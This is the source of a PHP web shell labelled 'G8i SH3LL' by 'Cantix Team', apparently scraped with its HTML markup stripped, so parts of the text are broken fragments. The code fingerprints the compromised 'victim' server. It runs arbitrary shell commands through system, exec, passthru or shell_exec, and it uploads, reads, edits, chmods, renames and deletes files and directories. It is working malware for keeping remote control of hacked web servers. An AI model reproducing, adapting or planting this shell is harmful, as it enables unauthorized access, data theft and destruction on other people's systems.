___________              .__.__          ________   ______   _________ __                
\_   _____/____    _____ |__|  | ___.__./  _____/  /  __  \ /   _____//  |______ _______ 
 |    __) \__  \  /     \|  |  |<   |  /   \  ___  >      < \_____  \\   __\__  \\_  __ \
 |     \   / __ \|  Y Y  \  |  |_\___  \    \_\  \/   --   \/        \|  |  / __ \|  | \/
 \___  /  (____  /__|_|  /__|____/ ____|\______  /\______  /_______  /|__| (____  /__|   
     \/        \/      \/        \/            \/        \/        \/           \/
© Cantix Team $value){ $_POST[$key] = stripslashes($value); } } echo ' G8i SH3LL v.1 '; echo ''; //Starting About victim $kernel = php_uname(); $ip = gethostbyname($_SERVER['HTTP_HOST']); /*fuction hdd*/ if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } $freespace = hdd(disk_free_space("/")); /*Code hdd*/ $total = hdd(disk_total_space("/")); $used = $total - $freespace; $mysql = (function_exists('mysql_connect')) ? "ON" : "OFF"; $curl = (function_exists('curl_version')) ? "ON" : "OFF"; $wget = (exe('wget --help')) ? "ON" : "OFF"; $perl = (exe('perl --help')) ? "ON" : "OFF"; $python = (exe('python --help')) ? "ON" : "OFF"; /*code wget python perl*/ $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "ON" : "OFF"; $ds = @ini_get("disable_functions"); $show_ds = (!empty($ds)) ? "$ds" : "NONE"; if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } //eksekusi echo "Name of Shell: CANTIX1337
"; echo "System: ".$kernel."
"; echo "Safe Mode: $sm
"; echo "Disable Functions: $show_ds
"; echo "Server IP: ".$ip." | Your IP: ".$_SERVER['REMOTE_ADDR']."
"; echo "Group: ".$group." (".$gid.") User: ".$user." (".$uid.")
"; echo "HardDisk: $used / $total ( Free: $freespace )
"; echo "MySQL: $mysql | Curl: $curl | Perl: $perl | Python: $python | WGET: $wget "; //ending about victim //starting home bar echo ""; echo "
"; echo ""; //fuction menu bar if($_GET['do'] == 'cmd') { echo "".$user."@".$ip.": ~ $ "; if($_POST['do_cmd']) { echo "
".exe($_POST['cmd'])."
"; } } elseif($_GET['logout'] == true) { unset($_SESSION[md5($_SERVER['HTTP_HOST'])]); echo ""; } //ending home bar echo ''; echo ''; if(isset($_GET['filesrc'])){ echo "
Current Dir : '; //Code Menu if(isset($_GET['path'])){ $path = $_GET['path']; }else{ $path = getcwd(); } $path = str_replace('\\','/',$path); $paths = explode('/',$path); foreach($paths as $id=>$pat){ if($pat == '' && $id == 0){ $a = true; echo '/'; continue; } if($pat == '') continue; echo ''.$pat.'/'; } echo '
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload Success Babe:*
'; }else{ echo '
Upload Failed
'; } } echo '
File Upload :
Current File : "; echo $_GET['filesrc']; echo '

'; echo('
'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'
'); }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '
'.$_POST['path'].'

'; if($_POST['opt'] == 'chmod'){ if(isset($_POST['perm'])){ if(chmod($_POST['path'],$_POST['perm'])){ echo 'Set Permission Success
'; }else{ echo 'Set Permission Failed
'; } } echo '
Permission :
'; }elseif($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo 'Ganti Nama Success Babe:*
'; }else{ echo 'Ganti Nama Failed
'; } $_POST['name'] = $_POST['newname']; } echo '
New Name :
'; } elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w'); if(fwrite($fp,$_POST['src'])){ echo 'Success Edit File
'; }else{ echo 'Failed Edit File
'; } fclose($fp); } echo '

'; } echo '
'; }else{ echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo 'Directory Terhapus
'; }else{ echo 'Directory Failed Terhapus
'; } }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){ echo 'File Terhapus
'; }else{ echo 'File Failed Dihapus
'; } } } echo '
'; $scandir = scandir($path); echo '
'; //For Code Column Directory foreach($scandir as $dir){ $dtype = filetype("$dir/$dirx"); $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx")); if(function_exists('posix_getpwuid')) { $downer = @posix_getpwuid(fileowner("$dir/$dirx")); $downer = $downer['name']; } else { //$downer = $uid; $downer = fileowner("$dir/$dirx"); } if(function_exists('posix_getgrgid')) { $dgrp = @posix_getgrgid(filegroup("$dir/$dirx")); $dgrp = $dgrp['name']; } else { $dgrp = filegroup("$dir/$dirx"); } if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue; echo ''; echo ""; echo ""; echo ""; echo "'; } //Code For File Column foreach($scandir as $file){ $ftype = filetype("$path/$file"); $ftime = date("F d Y g:i:s", filemtime("$path/$file")); if(function_exists('posix_getpwuid')) { $fowner = @posix_getpwuid(fileowner("$path/$file")); $fowner = $fowner['name']; } else { //$downer = $uid; $fowner = fileowner("$path/$file"); } if(function_exists('posix_getgrgid')) { $fgrp = @posix_getgrgid(filegroup("$path/$file")); $fgrp = $fgrp['name']; } else { $fgrp = filegroup("$path/$file"); } if(!is_file($path.'/'.$file)) continue; $size = filesize($path.'/'.$file)/1024; $size = round($size,3); if($size >= 1024){ $size = round($size/1024,2).' MB'; }else{ $size = $size.' KB'; } echo ''; echo ""; echo ""; echo ""; echo "'; } echo '
Name
Type
Last Modify
Owner/Group
Size
Permission
Action
'.$dir.'
$dtype
$dtime
$downer/$dgrp
--
"; if(is_writable($path.'/'.$dir)) echo ''; elseif(!is_readable($path.'/'.$dir)) echo ''; echo perms($path.'/'.$dir); if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo ''; echo '
'.$file.'
$ftype
$ftime
$fowner/$fgrp
$size
"; if(is_writable($path.'/'.$file)) echo ''; elseif(!is_readable($path.'/'.$file)) echo ''; echo perms($path.'/'.$file); if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo ''; echo '
'; } echo "
Copyright © ".date("Y")." - G8i Family
"; //Function Code HDD + exe function hdd($s) { if($s >= 1073741824) return sprintf('%1.2f',$s / 1073741824 ).' GB'; elseif($s >= 1048576) return sprintf('%1.2f',$s / 1048576 ) .' MB'; elseif($s >= 1024) return sprintf('%1.2f',$s / 1024 ) .' KB'; else return $s .' B'; } function exe($cmd) { if(function_exists('system')) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('exec')) { @exec($cmd,$results); $buff = ""; foreach($results as $result) { $buff .= $result; } return $buff; } elseif(function_exists('passthru')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('shell_exec')) { $buff = @shell_exec($cmd); return $buff; } } function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } ?>